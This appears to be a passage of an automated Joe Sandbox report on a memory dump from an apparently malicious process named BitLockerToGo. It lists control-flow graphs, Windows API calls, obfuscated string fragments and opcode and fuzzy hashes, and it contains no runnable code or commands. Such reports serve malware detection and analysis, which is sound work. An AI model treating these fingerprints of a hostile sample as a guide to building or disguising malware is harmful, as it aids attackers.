• String ID: 9=$@bq$@bq
• API String ID: 0-316456066
• Opcode ID: c1347c468daa831ee71e5dae199c1662b49994abf4336e13dcc994518d840b24
• Instruction ID: 35755ea2fee2548ef166cf2072f2c04e5b5edc333876189fadc4d885ac75e1d3
• Opcode Fuzzy Hash: c1347c468daa831ee71e5dae199c1662b49994abf4336e13dcc994518d840b24
• Instruction Fuzzy Hash: 10918D35A083514BC3249B25C8517EFBBE2EFDA314F08CA3DD4C9A7382DA785805879B

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 483 42a80b-42a83f 484 42a840-42a85a 483->484 484->484 485 42a85c-42a866 484->485 486 42a87b-42a883 485->486 487 42a868-42a86f 485->487 489 42a885 486->489 490 42a89c-42a8af 486->490 488 42a870-42a879 487->488 488->486 488->488 491 42a890-42a89a 489->491 492 42a8b0-42a8ca 490->492 491->490 491->491 492->492 493 42a8cc-42a8db 492->493 494 42a927-42a941 493->494 495 42a8dd-42a8e5 493->495 496 42a8f0-42a8f7 495->496 497 42a900-42a906 496->497 498 42a8f9-42a8fc 496->498 497->494 500 42a908-42a91f call 439af0 497->500 498->496 499 42a8fe 498->499 499->494 502 42a924 500->502 502->494
Strings
Memory Dump Source
• Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: <#:Z$DCBA$IO{B
• API String ID: 2994545307-3001781657
• Opcode ID: eb4e246fcae7f77e475b20ab0a4315972cd4437c3f998053f4b5719bcf771401
• Instruction ID: e8f0e9b6a8d6456f061768eb9e0068afe562bbdc9d967e798bf7ba60a950b8bf
• Opcode Fuzzy Hash: eb4e246fcae7f77e475b20ab0a4315972cd4437c3f998053f4b5719bcf771401
• Instruction Fuzzy Hash: 133169746083918FD7248B35A861B7BFBE0EF93304F58196CD0CA97293D3354812870E

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 507 42a749-42b976 call 42fd30 call 407fe0 513 42b980-42b9bf 507->513 513->513 514 42b9c1-42b9cb 513->514 515 42b9ed 514->515 516 42b9cd-42b9d6 514->516 517 42b9ef-42b9fb 515->517 518 42b9e0-42b9e9 516->518 519 42ba11-42ba5b call 43b5e0 GetPhysicallyInstalledSystemMemory call 41d4b0 517->519 520 42b9fd-42b9ff 517->520 518->518 521 42b9eb 518->521 527 42ba60-42ba7a 519->527 522 42ba00-42ba0d 520->522 521->517 522->522 524 42ba0f 522->524 524->519 528 42ba80-42bab1 527->528 528->528 529 42bab3-42bae3 528->529 530 42baf0-42bb23 529->530 530->530 531 42bb25-42bb2f 530->531 532 42bb31-42bb3f 531->532 533 42bb4d 531->533 535 42bb40-42bb49 532->535 534 42bb51-42bb59 533->534 536 42bb6b-42bb78 534->536 537 42bb5b-42bb5f 534->537 535->535 538 42bb4b 535->538 540 42bb7a-42bb81 536->540 541 42bb9b-42bbef 536->541 539 42bb60-42bb69 537->539 538->534 539->536 539->539 542 42bb90-42bb99 540->542 543 42bbf0-42bc0a 541->543 542->541 542->542 543->543 544 42bc0c-42bc16 543->544 545 42bc2b-42bc38 544->545 546 42bc18-42bc1f 544->546 548 42bc3a-42bc41 545->548 549 42bc5b-42bd01 545->549 547 42bc20-42bc29 546->547 547->545 547->547 550 42bc50-42bc59 548->550 550->549 550->550
APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042BA40
Strings
Memory Dump Source
• Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID: wH
• API String ID: 3960555810-1503671404
• Opcode ID: 735eff78948b21e92c26272058e6777a53df9390db2d3b00e6e92735ac06b047
• Instruction ID: 6938ec21c2c950272ecf71514532c80e00f36c867636421e33f396b57224f4d7
• Opcode Fuzzy Hash: 735eff78948b21e92c26272058e6777a53df9390db2d3b00e6e92735ac06b047
• Instruction Fuzzy Hash: F6A1067190C3E18BD335CF2994603ABBBE1AFD6304F58896ED4C997382D7398905CB96

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 551 43ccd0-43ccdf 552 43cd03-43cd0c 551->552 553 43cce1 551->553 555 43cd13-43cd29 552->555 556 43cd0e-43cd11 552->556 554 43ccf0-43ccf8 553->554 554->554 558 43ccfa-43ccfd 554->558 557 43cd30-43cd4f 555->557 556->555 557->557 559 43cd51-43cd67 557->559 558->552 560 43cd70-43cd93 559->560 560->560 561 43cd95-43cda2 560->561 562 43cdb0-43cdcc 561->562 562->562 563 43cdce-43cdd9 562->563 564 43ce31-43ce42 563->564 565 43cddb-43cde5 563->565 567 43ce50-43ce7b 564->567 566 43cdf0-43cdf7 565->566 569 43ce02-43ce0a 566->569 570 43cdf9-43cdfc 566->570 567->567 568 43ce7d-43ceaf call 438090 567->568 576 43ceb0-43cef2 568->576 569->564 573 43ce0c-43ce27 call 439af0 569->573 570->566 572 43cdfe-43ce00 570->572 572->564 577 43ce2c-43ce2f 573->577 576->576 578 43cef4-43cf01 576->578 577->564 579 43cf10-43cf2c 578->579 579->579 580 43cf2e-43cf39 579->580 581 43cf62-43cf66 580->581 582 43cf3b-43cf49 580->582 584 43cf9d-43cfab 581->584 583 43cf50-43cf57 582->583 587 43cf59-43cf5c 583->587 588 43cf68-43cf70 583->588 585 43cfb2-43cfc5 584->585 586 43cfad-43cfb0 584->586 589 43cfc7 585->589 590 43cfc9-43cff0 585->590 586->585 587->583 591 43cf5e-43cf60 587->591 588->584 592 43cf72-43cf91 call 439af0 588->592 589->590 591->584 594 43cf96-43cf9b 592->594 594->584
Strings
Memory Dump Source
• Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: ;:;<$
• API String ID: 2994545307-1755626032
• Opcode ID: ceafabc97ec7fc7112a437cbd8cc7f09de2b8a4465da014b00e24afc39a8be1b
• Instruction ID: 8782bf9c27d267b7fc4d337e2a4af93988c98bab6341f267782e84b0f748c24c
• Opcode Fuzzy Hash: ceafabc97ec7fc7112a437cbd8cc7f09de2b8a4465da014b00e24afc39a8be1b
• Instruction Fuzzy Hash: 9F816835A083208BC7288F24C89156BB7E2EBCA314F19963DE9D527391DB78AC06C7C5
Strings
Similarity
• API ID: InitializeThunk
• String ID: 36;$DCBA
Strings
Similarity
• API ID: InitializeThunk
• String ID: nq[P$rq[P
APIs
• ExitProcess.KERNEL32(00000000), ref: 0040897D
  • Part of subcall function 0040C7C0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C7D3
Similarity
• API ID: ExitInitializeProcess
APIs
• LdrInitializeThunk.NTDLL(0043BC68,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439B1E
Similarity
• API ID: InitializeThunk
Strings
Similarity
• API ID: InitializeThunk
• String ID: DCBA
Strings
Similarity
• API ID: InitializeThunk
• String ID: DCBA
Strings
Similarity
• String ID: [\
Similarity
• API ID: InitializeThunk
Similarity
• API ID: InitializeThunk
Similarity
• API ID: InitializeThunk
APIs
• GetUserDefaultUILanguage.KERNELBASE ref: 00433FB6
Similarity
• API ID: DefaultLanguageUser
Similarity
• API ID: BlanketProxy
Similarity
• API ID: BlanketProxy
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C805
Similarity
• API ID: InitializeSecurity
APIs
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C7D3
Similarity
• API ID: Initialize
                                                                                    APIs
                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000), ref: 00439AC2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 6bfb9734ed57ce0f3447567262144bb0c239ecc5af525e294061333a46c12a5e
                                                                                    • Instruction ID: 195ea5378b4211f4488e35c1581176f060d5432bd187ca494063fd25216283c4
                                                                                    • Opcode Fuzzy Hash: 6bfb9734ed57ce0f3447567262144bb0c239ecc5af525e294061333a46c12a5e
                                                                                    • Instruction Fuzzy Hash: 1CB09B3514805067D5142715BC0DF8B6F24DFC5751F1012B7F2015407546655881D59C
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 004380BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: dfa9bcdcf4992effd9ebc96b3b68172bd96eb1e6feaa9f1728678ead5c2ba133
                                                                                    • Instruction ID: 619cd3f0a1d579054a44b95f095a6da8aabd5bd483f4f5c16aff5eb9f323e829
                                                                                    • Opcode Fuzzy Hash: dfa9bcdcf4992effd9ebc96b3b68172bd96eb1e6feaa9f1728678ead5c2ba133
                                                                                    • Instruction Fuzzy Hash: B7B00234145515B9E57117115CD5F7F1D6CDF43E9DF600054B208180D146545442D57D
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(?,00000000), ref: 004380FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: e1e10fe9efff281f5ff51a9d723dbbd7af2ed098d80cef64a20feb2d9ca161ab
                                                                                    • Instruction ID: 7819ff3d06509e8342e432a01b3300ba2fcbd0b48a11999bf07549068c8c729b
                                                                                    • Opcode Fuzzy Hash: e1e10fe9efff281f5ff51a9d723dbbd7af2ed098d80cef64a20feb2d9ca161ab
                                                                                    • Instruction Fuzzy Hash: 61B01234085010AAD5103B11BC0DFCB7F10EF45311F0140E2B200640B287615841C9CC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $ $"$$$%$%$&$+$+$.$.$.$3$4$A$A$A$A$A$A$B$B$B$B$B$B$C$C$C$C$C$C$D$D$D$D$D$D$D$D$H$H$H$J$K$K$L$L$P$P$Q$Q$T$Y$Z$[$\$`$a$a$c$c$d$e$e$g$i$k$l$m$o$o$p$p$r$r$r$r$s$t$v$v$x$z$|$~$~
                                                                                    • API String ID: 0-1347705104
                                                                                    • Opcode ID: fef2ae686b8e8c6acf6d92a36c27e622645ddadac221ef3b137f30e792adf8bd
                                                                                    • Instruction ID: 5247b736cec1ace8f2ead6485fecf5c8bb33a1d48f45eef8b81bfa453b640866
                                                                                    • Opcode Fuzzy Hash: fef2ae686b8e8c6acf6d92a36c27e622645ddadac221ef3b137f30e792adf8bd
                                                                                    • Instruction Fuzzy Hash: E8139D3160C7C18AD334CB38C44539FBBE1ABD6324F188A6EE4D9873D2D6B989858757
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: $$+$3$4$>$A$A$B$C$D$DABCD$O$P$U$V$Z$`$h
                                                                                    • API String ID: 2994545307-175843415
                                                                                    • Opcode ID: 08891286ca56ec213cebd68c08deb92daf5d7b8f3604174f7b55971068ff1ac9
                                                                                    • Instruction ID: 483331af4594b857fe0ce6079c8881b492f380997123de76c7c70a9bde850424
                                                                                    • Opcode Fuzzy Hash: 08891286ca56ec213cebd68c08deb92daf5d7b8f3604174f7b55971068ff1ac9
                                                                                    • Instruction Fuzzy Hash: 2982C57160C7808BD3249B38C4953AFBBE2ABD5314F198A3EE5D9873D1D6788885CB47
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: NV[K$UAPS$UXWZ$VM$VQlJ$h$mtwz$n$rrip$tYCZ
                                                                                    • API String ID: 0-3331790720
                                                                                    • Opcode ID: 23847872f2627ba97969ec9efbc11b36efa7c93efb836e547c5bc3453f7e3632
                                                                                    • Instruction ID: 7741a0428823d80e118f5df9010b1c44a856e0838fbdef6cf153a24b4129b43b
                                                                                    • Opcode Fuzzy Hash: 23847872f2627ba97969ec9efbc11b36efa7c93efb836e547c5bc3453f7e3632
                                                                                    • Instruction Fuzzy Hash: 0381E0B150D3E18BE331CF25A0907ABBFE1AB96340F28496DC5DD5B342C7791805CB9A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: *$"*$*$"*$/$34$\iPe$dINO$j|$vq$wy
                                                                                    • API String ID: 0-2503078089
                                                                                    • Opcode ID: bcf6e07e8729db145a630841b2436792e2e9d57967a13fccd60a43c16f6ba714
                                                                                    • Instruction ID: 0a748ab88c072d9ecacf6db472457a042bc4677918580400a89f79172a34eab1
                                                                                    • Opcode Fuzzy Hash: bcf6e07e8729db145a630841b2436792e2e9d57967a13fccd60a43c16f6ba714
                                                                                    • Instruction Fuzzy Hash: 6EC108716083408FD718DF65C8916AFBBE2EBC2314F14893DF4D19B392D639960ACB56
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: C>X0$D$D"A$$J6EH$MN$P&@8$]*N,$^:B<$xYw[
                                                                                    • API String ID: 0-3292156457
                                                                                    • Opcode ID: c6d5bb265bdb93c89c28a49cddbc124b38db168f9fe5d0d1307b72b25f450001
                                                                                    • Instruction ID: ad70754358f75f96f89e5d5f4c9addb1857235af53de9c673c40fbd92a9384dd
                                                                                    • Opcode Fuzzy Hash: c6d5bb265bdb93c89c28a49cddbc124b38db168f9fe5d0d1307b72b25f450001
                                                                                    • Instruction Fuzzy Hash: 43917AB0108340CFD3248F14C4A1BABBBF1FF86359F458A5DE4894F2A1E3798946CB5A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: DCBA$DCBA$DCBA$[\$5Zl$5Zl$Z\$^P
                                                                                    • API String ID: 2994545307-3151724278
                                                                                    • Opcode ID: ab693a78d0b19306fe809804e87f005d828ab756b41879f79a1b5e553287b66c
                                                                                    • Instruction ID: 30ab7f929d8a07dc3d8873c68d2278d649e136490da9de6a5d43bf32cd8d4692
                                                                                    • Opcode Fuzzy Hash: ab693a78d0b19306fe809804e87f005d828ab756b41879f79a1b5e553287b66c
                                                                                    • Instruction Fuzzy Hash: 1892A8316493409BD720CF64C8857AFB7E2FBD5300F18856EE5859B391D3B99C82CB9A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: L$d"d$$l2r4$m:i<$|&t8$Z\$^P
                                                                                    • API String ID: 0-1724584702
                                                                                    • Opcode ID: fb70b4c9c05101007d508a61fb3708714a996244607e1c5ef3b49211955d8373
                                                                                    • Instruction ID: 2a9502ae1b22e79b802cbd78b7a1b8f54dc075db748f69bc6e5fa1cfc8ef5e0c
                                                                                    • Opcode Fuzzy Hash: fb70b4c9c05101007d508a61fb3708714a996244607e1c5ef3b49211955d8373
                                                                                    • Instruction Fuzzy Hash: 0F6134B29093908BD335CF5684923EBBAE2EBD9304F58892DC4CD6B355D7384552CB8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LGHI$ec}y$fp~f$jdkb$jk$CIE
                                                                                    • API String ID: 0-1801165453
                                                                                    • Opcode ID: bcc18b650d6663702cff9dae8dad8c9ea42bcf290737524e91fd9fa945319b3e
                                                                                    • Instruction ID: f7a6e3dff254edd297ad885eaa72bead2b20a4844f05c981639e4c953a739855
                                                                                    • Opcode Fuzzy Hash: bcc18b650d6663702cff9dae8dad8c9ea42bcf290737524e91fd9fa945319b3e
                                                                                    • Instruction Fuzzy Hash: 62C1E27524C3508BC324DF2584516AFFBE3ABC2304F19897DE4D56F386D67988168B8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \}$kl$u$z\R6$|~
                                                                                    • API String ID: 0-839039025
                                                                                    • Opcode ID: 61e48381633d6ac082315ab95e76aadf48114a4cc7cad988b7e374e2d1fe872f
                                                                                    • Instruction ID: d376f31ca106a3e18cae543faef04638516657012839f8bd0dc1c3cc62336a40
                                                                                    • Opcode Fuzzy Hash: 61e48381633d6ac082315ab95e76aadf48114a4cc7cad988b7e374e2d1fe872f
                                                                                    • Instruction Fuzzy Hash: 9D7114716083A18FD335CF38C8917ABBBD1EB96304F18896DD4C98B342D77949498B96
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $&=",$)${yrs
                                                                                    • API String ID: 0-1254945749
                                                                                    • Opcode ID: d40627908e96dda92a4d965530751face9949d40852ba6946d5ffca92c465dbb
                                                                                    • Instruction ID: 81033180e824efb6238312a03b4fd97b2519aaf2c39ab56ec81eecc0e62b379a
                                                                                    • Opcode Fuzzy Hash: d40627908e96dda92a4d965530751face9949d40852ba6946d5ffca92c465dbb
                                                                                    • Instruction Fuzzy Hash: EB52367590C3908FC725CF25C8807AFBBE1AF96304F08856EE8D55B392D739894ACB56
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: +[J;$DCBA$DCBA$f
                                                                                    • API String ID: 2994545307-979426530
                                                                                    • Opcode ID: b779821aa48d1f537e0a5818c19115795b1aac73c8baaf1e0f495c05489447a5
                                                                                    • Instruction ID: 6e64e34dcd31ac6d1c56d3237c8ca23546036134a602b87600847ab7c5b3d5d6
                                                                                    • Opcode Fuzzy Hash: b779821aa48d1f537e0a5818c19115795b1aac73c8baaf1e0f495c05489447a5
                                                                                    • Instruction Fuzzy Hash: A912F3716083418BC718CF29C89072BB7E2FBD9314F189A6EF49597391DB79ED018B86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DCBA$DCBA$DCBA$DCBA
                                                                                    • API String ID: 0-1380943437
                                                                                    • Opcode ID: 1fad232efbf2104744d23570844e905b283685d5ef7122856a7b502bd80bc565
                                                                                    • Instruction ID: db2459913d76577c8d131428bae0f0046f550a55b2fe272ecb3189ba83e80acf
                                                                                    • Opcode Fuzzy Hash: 1fad232efbf2104744d23570844e905b283685d5ef7122856a7b502bd80bc565
                                                                                    • Instruction Fuzzy Hash: 6AC113316083119BD710DF50C881B2BF7E2EB89714F16A97EE98567382D7799C018BAA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: A$B$C$D
                                                                                    • API String ID: 0-483099237
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 0-2222620526
                                                                                    • Opcode ID: e97ef76f18b33331658c6dadffdbf4a03ec667c33888f79711ecf2f3b557a6d1
                                                                                    • Instruction ID: 872a48a09982231b8dafbd347f7c63a6ccfc1133244f06d7031620cbbfbec7ca
                                                                                    • Opcode Fuzzy Hash: e97ef76f18b33331658c6dadffdbf4a03ec667c33888f79711ecf2f3b557a6d1
                                                                                    • Instruction Fuzzy Hash: 73512632A047108BC7209E2C8C8165BF7E2FB8A324F19A67EE89497395DB789C45C7D5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ytyu
                                                                                    • API String ID: 0-3122247562
                                                                                    • Opcode ID: f053fbe5bc21165d167fab0e9e4a8a53879f261e0ed1905fc728f89db18bf12f
                                                                                    • Instruction ID: 12b0de02a6f5ab75272d138379b8755f22481c091a64ef22d8aed6e45f9efa9c
                                                                                    • Opcode Fuzzy Hash: f053fbe5bc21165d167fab0e9e4a8a53879f261e0ed1905fc728f89db18bf12f
                                                                                    • Instruction Fuzzy Hash: AA512B616083D14BD7298F3994A07BBBBD2DFD7304F5885BDC0D69B286CB3841068759
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ytyu
                                                                                    • API String ID: 0-3122247562
                                                                                    • Opcode ID: 3494bfe6291a6431b01350dcad90491f8a54cb059fc7b75e339d49c7782d6889
                                                                                    • Instruction ID: 648daf82285625cf77c371538089869eb7515d56c2969b46c42d7a52f9289bc7
                                                                                    • Opcode Fuzzy Hash: 3494bfe6291a6431b01350dcad90491f8a54cb059fc7b75e339d49c7782d6889
                                                                                    • Instruction Fuzzy Hash: 27412D6060C3D24BD73A8F2994A47B7BFE1DFA3344F5885AEC0D65B242CB384506C75A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ytyu
                                                                                    • API String ID: 0-3122247562
                                                                                    • Opcode ID: cbca36ce238727ca39cac4ff67d5d0eb6a20784f1e8b4ad77352ae9aa64df1ca
                                                                                    • Instruction ID: 9f127353f7bba25dfea1de63524ab0f2f798c8a367a6f857e5b761ee54c0f219
                                                                                    • Opcode Fuzzy Hash: cbca36ce238727ca39cac4ff67d5d0eb6a20784f1e8b4ad77352ae9aa64df1ca
                                                                                    • Instruction Fuzzy Hash: 5C312A6060C3D24BD73A8F2994647BBBFE1DFA3344F5889AEC0D65B282CB344506C75A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: !y{{
                                                                                    • API String ID: 0-1777749009
                                                                                    • Opcode ID: 34a11b86288b67153c8836f152e560bb3d0582ddd333178ec40e8e1900dbe185
                                                                                    • Instruction ID: 60daa59d1a784ae211c2b3ef0204a34bfe7960cd735750a74c34f91c64a24c52
                                                                                    • Opcode Fuzzy Hash: 34a11b86288b67153c8836f152e560bb3d0582ddd333178ec40e8e1900dbe185
                                                                                    • Instruction Fuzzy Hash: 912199729493508BC7148E29D8503E7FBE1EFD2314F1C84AFE8C5EB301E23988168796
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 2994545307-2222620526
                                                                                    • Opcode ID: a3285eac4c9d0b2840b591ec952b068857be1a3abe61b60f757daffff14c0e29
                                                                                    • Instruction ID: 58c59863d1f9f3c4caf99bc5159be815190c9076244c5d1684e7e5d48b42dc26
                                                                                    • Opcode Fuzzy Hash: a3285eac4c9d0b2840b591ec952b068857be1a3abe61b60f757daffff14c0e29
                                                                                    • Instruction Fuzzy Hash: DF210474708212BFE6288B14DD41F3773A1F796324FA0862DE652A62D0D6F49C128B59
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 0-2222620526
                                                                                    • Opcode ID: 4c7d43c54ce5063488470e0d67501b2030e8c17e96c1585fe75e4ae10792527b
                                                                                    • Instruction ID: 54541ef06add59dfd3263f9efd68384cd03068db4430ffcf6da8f422e4931867
                                                                                    • Opcode Fuzzy Hash: 4c7d43c54ce5063488470e0d67501b2030e8c17e96c1585fe75e4ae10792527b
                                                                                    • Instruction Fuzzy Hash: 8D01D2303083909BD7249F05D89193FF7A2FBDA718FA5963DD58513622C779AC02878E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
